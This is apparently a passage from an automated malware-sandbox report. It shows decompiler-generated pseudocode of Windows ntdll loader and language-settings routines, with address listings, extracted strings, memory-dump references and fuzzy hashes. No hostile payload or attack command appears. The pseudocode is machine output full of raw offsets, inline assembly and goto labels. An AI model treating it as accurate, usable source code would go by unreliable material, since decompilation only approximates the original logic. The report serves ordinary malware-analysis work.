				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E04CE934A() != 0) {
								_t159 = E04D5A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4dc5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04D55510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4dc5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E04CE849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04CE8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04CE8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4dc5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4dc5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04CF2280(_t92, 0x4dc86cc);
															_t94 = E04DA9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E04D061A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4dc5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04CE8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4dc5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4dc5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E04D1F380(_t136, 0x4cb1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04CF2280(_t108, 0x4dc86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E04D061A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04DA9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E04CEFFB0(_t118, _t156, 0x4dc86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04D19A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                            0x04ce8799
                                                                                            0x04ce879d
                                                                                            0x04ce87a1
                                                                                            0x04ce87a3
                                                                                            0x04ce87a8
                                                                                            0x04ce87c3
                                                                                            0x04ce87c3
                                                                                            0x04ce87c8
                                                                                            0x04ce87d1
                                                                                            0x04ce87d4
                                                                                            0x04ce87d8
                                                                                            0x04ce87e5
                                                                                            0x04ce87ec
                                                                                            0x04d39bfe
                                                                                            0x04d39c00
                                                                                            0x04d39c02
                                                                                            0x04d39c08
                                                                                            0x04d39c0d
                                                                                            0x04d39c0f
                                                                                            0x04d39c14
                                                                                            0x04d39c2d
                                                                                            0x04d39c32
                                                                                            0x04d39c37
                                                                                            0x04d39c3a
                                                                                            0x04d39c3c
                                                                                            0x04d39c42
                                                                                            0x04d39c42
                                                                                            0x04d39c3c
                                                                                            0x04d39c02
                                                                                            0x04ce87da
                                                                                            0x04ce87df
                                                                                            0x04ce87e3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce87e3
                                                                                            0x04ce87f2
                                                                                            0x00000000
                                                                                            0x04ce87fb
                                                                                            0x04ce87fd
                                                                                            0x04ce87fe
                                                                                            0x04ce880e
                                                                                            0x04ce880f
                                                                                            0x04ce8810
                                                                                            0x04ce8814
                                                                                            0x04ce881a
                                                                                            0x04ce881c
                                                                                            0x04ce881f
                                                                                            0x04ce8821
                                                                                            0x04ce8822
                                                                                            0x04ce8824
                                                                                            0x04ce8826
                                                                                            0x04ce882c
                                                                                            0x04ce882e
                                                                                            0x04d39c48
                                                                                            0x04d39c48
                                                                                            0x04ce8834
                                                                                            0x04ce8834
                                                                                            0x04ce8837
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce8837
                                                                                            0x04ce882e
                                                                                            0x04ce883d
                                                                                            0x04ce8840
                                                                                            0x04ce8843
                                                                                            0x04ce8846
                                                                                            0x04ce8849
                                                                                            0x04ce884c
                                                                                            0x04ce884e
                                                                                            0x04ce8850
                                                                                            0x04ce8852
                                                                                            0x04ce8854
                                                                                            0x04ce8857
                                                                                            0x04ce88b4
                                                                                            0x04ce88b6
                                                                                            0x04ce88b6
                                                                                            0x04ce8859
                                                                                            0x04ce8859
                                                                                            0x04ce8859
                                                                                            0x04ce8861
                                                                                            0x04ce8866
                                                                                            0x04ce886a
                                                                                            0x04ce893d
                                                                                            0x04ce8941
                                                                                            0x00000000
                                                                                            0x04ce8947
                                                                                            0x04ce8947
                                                                                            0x04ce894a
                                                                                            0x04ce894c
                                                                                            0x00000000
                                                                                            0x04ce8952
                                                                                            0x04ce8955
                                                                                            0x04ce895a
                                                                                            0x04ce895d
                                                                                            0x04ce895d
                                                                                            0x04ce895f
                                                                                            0x04ce8961
                                                                                            0x04ce8961
                                                                                            0x04ce8968
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce896a
                                                                                            0x04ce896b
                                                                                            0x04ce896e
                                                                                            0x00000000
                                                                                            0x04ce8970
                                                                                            0x04ce8970
                                                                                            0x04ce8970
                                                                                            0x04ce8970
                                                                                            0x04ce8972
                                                                                            0x04ce8972
                                                                                            0x04ce8974
                                                                                            0x00000000
                                                                                            0x04ce897a
                                                                                            0x04ce897a
                                                                                            0x04ce897d
                                                                                            0x00000000
                                                                                            0x04ce8983
                                                                                            0x04d39c65
                                                                                            0x04d39c6d
                                                                                            0x04d39c72
                                                                                            0x04d39c75
                                                                                            0x04d39c75
                                                                                            0x04d39c82
                                                                                            0x04d39c86
                                                                                            0x04d39c87
                                                                                            0x04d39c88
                                                                                            0x04d39c89
                                                                                            0x04d39c8c
                                                                                            0x04d39c90
                                                                                            0x04d39c95
                                                                                            0x04d39c97
                                                                                            0x04d39ca0
                                                                                            0x04d39ca3
                                                                                            0x04d39ca9
                                                                                            0x04d39ca9
                                                                                            0x00000000
                                                                                            0x04d39ca9
                                                                                            0x04d39ca3
                                                                                            0x00000000
                                                                                            0x04d39c97
                                                                                            0x04ce897d
                                                                                            0x00000000
                                                                                            0x04ce8974
                                                                                            0x04ce8988
                                                                                            0x04ce8992
                                                                                            0x04ce8996
                                                                                            0x00000000
                                                                                            0x04ce8996
                                                                                            0x04ce894c
                                                                                            0x00000000
                                                                                            0x04ce8870
                                                                                            0x04ce887b
                                                                                            0x04ce887d
                                                                                            0x04ce887f
                                                                                            0x04ce8881
                                                                                            0x04ce8884
                                                                                            0x04ce8884
                                                                                            0x04ce8886
                                                                                            0x04ce8889
                                                                                            0x04ce888c
                                                                                            0x04ce888e
                                                                                            0x04ce8891
                                                                                            0x04ce8891
                                                                                            0x04ce8898
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce889a
                                                                                            0x04ce889b
                                                                                            0x04ce889e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce88a0
                                                                                            0x04ce88a8
                                                                                            0x04ce88b0
                                                                                            0x04ce88b2
                                                                                            0x04ce88d3
                                                                                            0x04ce88d5
                                                                                            0x00000000
                                                                                            0x04ce88d7
                                                                                            0x04ce88db
                                                                                            0x04ce88dc
                                                                                            0x04ce88e0
                                                                                            0x04ce88e8
                                                                                            0x04ce88ee
                                                                                            0x04ce88f0
                                                                                            0x04ce88f3
                                                                                            0x04ce88fc
                                                                                            0x04ce8901
                                                                                            0x04ce8906
                                                                                            0x04ce890c
                                                                                            0x04ce890c
                                                                                            0x04ce890f
                                                                                            0x04ce8916
                                                                                            0x04ce8917
                                                                                            0x04ce8918
                                                                                            0x04ce8919
                                                                                            0x04ce891a
                                                                                            0x04ce891f
                                                                                            0x04ce8921
                                                                                            0x04d39c52
                                                                                            0x04d39c55
                                                                                            0x04d39c5b
                                                                                            0x04d39cac
                                                                                            0x04d39cc0
                                                                                            0x04d39cc0
                                                                                            0x04d39c55
                                                                                            0x04ce8927
                                                                                            0x04ce8927
                                                                                            0x04ce892f
                                                                                            0x04ce8933
                                                                                            0x00000000
                                                                                            0x04ce88f5
                                                                                            0x04ce88f5
                                                                                            0x00000000
                                                                                            0x04ce88f7
                                                                                            0x04ce88f7
                                                                                            0x04ce88fa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce88fa
                                                                                            0x04ce88f5
                                                                                            0x04ce88f3
                                                                                            0x00000000
                                                                                            0x04ce88d5
                                                                                            0x00000000
                                                                                            0x04ce88b2
                                                                                            0x04ce88c9
                                                                                            0x00000000
                                                                                            0x04ce88c9
                                                                                            0x04ce887f
                                                                                            0x04ce886a
                                                                                            0x04ce8857
                                                                                            0x04ce8852
                                                                                            0x04ce88bf
                                                                                            0x04ce88bf
                                                                                            0x04ce87aa
                                                                                            0x04ce87ad
                                                                                            0x04ce87ae
                                                                                            0x04ce87b4
                                                                                            0x04ce87b5
                                                                                            0x04ce87b6
                                                                                            0x04ce87b8
                                                                                            0x04ce87bd
                                                                                            0x04ce87c1
                                                                                            0x04ce87f4
                                                                                            0x04ce87fa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce87c1
                                                                                            0x00000000

                                                                                            Strings
                                                                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04D39C18
                                                                                            • LdrpDoPostSnapWork, xrefs: 04D39C1E
                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 04D39C28
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                            • API String ID: 0-1948996284
                                                                                            • Opcode ID: 740a793a6e7e93e87af563761354a0cd5ba66801cea7472850335e0dae4f3e6d
                                                                                            • Instruction ID: ff4a5edbd20cad21ba965a1b033647327e4b739186ee4f465210c0e2da696b34
                                                                                            • Opcode Fuzzy Hash: 740a793a6e7e93e87af563761354a0cd5ba66801cea7472850335e0dae4f3e6d
                                                                                            • Instruction Fuzzy Hash: EF911571B00216AFDF28EF5AC4919BA73B6FF44754B0441A9ED45AB240EB30FE41CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CE7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 98%
                                                                                            			E04CE7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E04CECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E04CDC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4dc5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04D55510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4dc5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04CF7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04CF7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04D57016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04CF7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04CF7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04D57016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E04D0A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E04CDB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                            0x04ce7e4c
                                                                                            0x04ce7e50
                                                                                            0x04ce7e55
                                                                                            0x04ce7e58
                                                                                            0x04ce7e5d
                                                                                            0x04ce7e71
                                                                                            0x04ce7f33
                                                                                            0x04ce7e77
                                                                                            0x04ce7e77
                                                                                            0x04ce7e79
                                                                                            0x04ce7e79
                                                                                            0x04ce7e7e
                                                                                            0x04ce7f45
                                                                                            0x04d39848
                                                                                            0x00000000
                                                                                            0x04d39848
                                                                                            0x04ce7f4e
                                                                                            0x04ce7f53
                                                                                            0x04ce7f5a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d3985a
                                                                                            0x04d39862
                                                                                            0x04d39866
                                                                                            0x00000000
                                                                                            0x04d3986c
                                                                                            0x00000000
                                                                                            0x04d3986c
                                                                                            0x04ce7e84
                                                                                            0x04ce7e84
                                                                                            0x04ce7e8d
                                                                                            0x04d39871
                                                                                            0x04ce7eb8
                                                                                            0x04ce7ec0
                                                                                            0x04ce7ec0
                                                                                            0x04ce7e9a
                                                                                            0x04d3987e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d39884
                                                                                            0x04d3988b
                                                                                            0x04d398a7
                                                                                            0x04d398ac
                                                                                            0x04d398b1
                                                                                            0x04d398b6
                                                                                            0x04d398b8
                                                                                            0x04d398b8
                                                                                            0x04d398b9
                                                                                            0x00000000
                                                                                            0x04d398b9
                                                                                            0x04ce7ea0
                                                                                            0x04ce7ea7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce7eac
                                                                                            0x04ce7eb1
                                                                                            0x04ce7ec6
                                                                                            0x04ce7ed0
                                                                                            0x04d398cc
                                                                                            0x04ce7ed6
                                                                                            0x04ce7ed6
                                                                                            0x04ce7ed6
                                                                                            0x04ce7ede
                                                                                            0x04ce7ee3
                                                                                            0x04d398e3
                                                                                            0x04d398f0
                                                                                            0x04d39902
                                                                                            0x04d398f2
                                                                                            0x04d398fb
                                                                                            0x04d398fb
                                                                                            0x04d39907
                                                                                            0x04d3991d
                                                                                            0x04d3991d
                                                                                            0x04d39907
                                                                                            0x04d398e3
                                                                                            0x04ce7ef0
                                                                                            0x04ce7f14
                                                                                            0x04ce7f14
                                                                                            0x04ce7f1e
                                                                                            0x04d39946
                                                                                            0x04ce7f24
                                                                                            0x04ce7f24
                                                                                            0x04ce7f24
                                                                                            0x04ce7f2c
                                                                                            0x04d3996a
                                                                                            0x04d39975
                                                                                            0x04d39975
                                                                                            0x04d3997e
                                                                                            0x04d39993
                                                                                            0x04d39993
                                                                                            0x04d3997e
                                                                                            0x00000000
                                                                                            0x04ce7ef2
                                                                                            0x04ce7efc
                                                                                            0x04ce7f0a
                                                                                            0x04ce7f0e
                                                                                            0x04d39933
                                                                                            0x00000000
                                                                                            0x04d39933
                                                                                            0x00000000
                                                                                            0x04ce7f0e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce7eb1

                                                                                            Strings
                                                                                            • LdrpCompleteMapModule, xrefs: 04D39898
                                                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 04D39891
                                                                                            • minkernel\ntdll\ldrmap.c, xrefs: 04D398A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                            • API String ID: 0-1676968949
                                                                                            • Opcode ID: 8cd3dfca618eb2518b0454b3ca7614c2f31f8444b47260ceb961ff6b671616d5
                                                                                            • Instruction ID: e7d5c514a70cf1ea5226149ef96f736c86a24afe346b050cf2231b466c8956bb
                                                                                            • Opcode Fuzzy Hash: 8cd3dfca618eb2518b0454b3ca7614c2f31f8444b47260ceb961ff6b671616d5
                                                                                            • Instruction Fuzzy Hash: 9751ED716017419FEB21CB6AC994B7AB7A2EB41718F0806A9E9519B3E1D774FD00CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CDE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E04CDE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E04CDF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E04D195D0();
						}
						if(_t78 != 0) {
							L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E04D1FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E04D1BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04D19600();
					if(_t97 < 0) {
						goto L6;
					}
					E04D1BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L04CDF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E04D1BB40(_t83, _t102 + 0x24, _t78);
								if(L04CE43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E04D1BB40(_t84, _t102 + 0x24, _t94);
									if(L04CE43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                            0x04cde620
                                                                                            0x04cde628
                                                                                            0x04cde62f
                                                                                            0x04cde631
                                                                                            0x04cde635
                                                                                            0x04cde637
                                                                                            0x04cde63e
                                                                                            0x04d35503
                                                                                            0x04d35503
                                                                                            0x04cde64c
                                                                                            0x04cde64c
                                                                                            0x04cde651
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cde661
                                                                                            0x04cde665
                                                                                            0x04d3542a
                                                                                            0x04cde715
                                                                                            0x04cde71a
                                                                                            0x04cde71c
                                                                                            0x04cde720
                                                                                            0x04cde720
                                                                                            0x04cde727
                                                                                            0x04cde736
                                                                                            0x04cde736
                                                                                            0x04cde743
                                                                                            0x04cde743
                                                                                            0x04cde673
                                                                                            0x04cde678
                                                                                            0x04cde67d
                                                                                            0x04cde682
                                                                                            0x04cde685
                                                                                            0x04cde692
                                                                                            0x04cde69b
                                                                                            0x04cde6a3
                                                                                            0x04cde6ad
                                                                                            0x04cde6b1
                                                                                            0x04cde6b2
                                                                                            0x04cde6bb
                                                                                            0x04cde6bf
                                                                                            0x04cde6c0
                                                                                            0x04cde6c8
                                                                                            0x04cde6cc
                                                                                            0x04cde6d5
                                                                                            0x04cde6d9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cde6e5
                                                                                            0x04cde6ea
                                                                                            0x04cde6f9
                                                                                            0x04cde70b
                                                                                            0x04cde70f
                                                                                            0x04d35439
                                                                                            0x04d3545e
                                                                                            0x04d3545e
                                                                                            0x00000000
                                                                                            0x04d3545e
                                                                                            0x04d3543b
                                                                                            0x04d3543e
                                                                                            0x04d35440
                                                                                            0x04d35445
                                                                                            0x04d35472
                                                                                            0x04d35475
                                                                                            0x04d3548d
                                                                                            0x04d35493
                                                                                            0x04d354a9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d354ab
                                                                                            0x04d354b4
                                                                                            0x04d354bc
                                                                                            0x04d354c8
                                                                                            0x04d354de
                                                                                            0x04d354fb
                                                                                            0x04d354e0
